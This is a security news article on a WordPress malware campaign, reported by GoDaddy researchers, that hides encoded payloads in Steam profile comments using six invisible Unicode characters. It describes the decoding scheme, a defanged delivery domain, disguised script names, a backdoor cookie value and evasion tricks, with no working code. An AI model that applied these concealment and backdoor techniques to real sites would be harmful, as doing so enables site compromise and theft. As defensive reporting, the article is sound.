WordPress Malware Hides in Steam Profiles: 2,000 Sites Hit

Security researchers at GoDaddy have uncovered a sophisticated WordPress malware campaign that leverages Steam Community profile comments to conceal command-and-control (C2) communications. The operation, which first came to light in July 2025, has successfully infected approximately 1,980 WordPress websites. The threat actor exploits Valve's gaming platform to host encrypted payloads, effectively eliminating the need for dedicated C2 infrastructure and bypassing traditional network-based detection mechanisms. The infection vector remains under investigation, though researchers believe attackers may have gained access through stolen admin credentials, compromised FTP/SFTP accounts, vulnerable WordPress themes or plugins, or potentially a supply-chain compromise. Website operators concerned about potential exposure can use email breach checker tools to determine if their credentials have been compromised in related incidents.

The attack chain begins with first-stage malware implanted on compromised WordPress sites that queries specific Steam Community profiles, extracting text from seemingly innocuous comment sections. These comments contain six invisible Unicode characters used to encode the malicious payload: Zero-width non-joiner (U+200C), Zero-width joiner (U+200D), Function application (U+2061), Invisible times (U+2062), Invisible separator (U+2063), and Invisible plus (U+2064). GoDaddy's analysis reveals that the decoder ignores visible characters entirely, mapping invisible characters to numerical values, converting them to binary, and reconstructing the actual bytecode. "This encoding allows binary data to be embedded within normal-looking text. The visible characters serve as camouflage while the invisible characters carry the actual payload," researchers explained in their technical report.

The decoded payload constructs a connection to hello-mywordl[.]info, which delivers JavaScript code disguised as legitimate libraries with filenames such as asahi-jquery-min-bundle and lodash.core.min.js. This JavaScript is injected into every frontend page of compromised websites. The final stage deploys a backdoor capable of executing base64-encoded PHP code when presented with specially crafted POST requests containing the authentication cookie "tEcaKKXesb". To evade detection, the malware employs octal and hex escape sequences for obfuscated strings, randomized function names, fake disabled logging code, and standard WordPress API calls to blend with legitimate site activity. Site administrators should audit their installations for unexpected outbound connections to Steam domains and verify the integrity of all loaded JavaScript resources using tools like SSL/TLS checker to inspect certificate details of suspicious domains.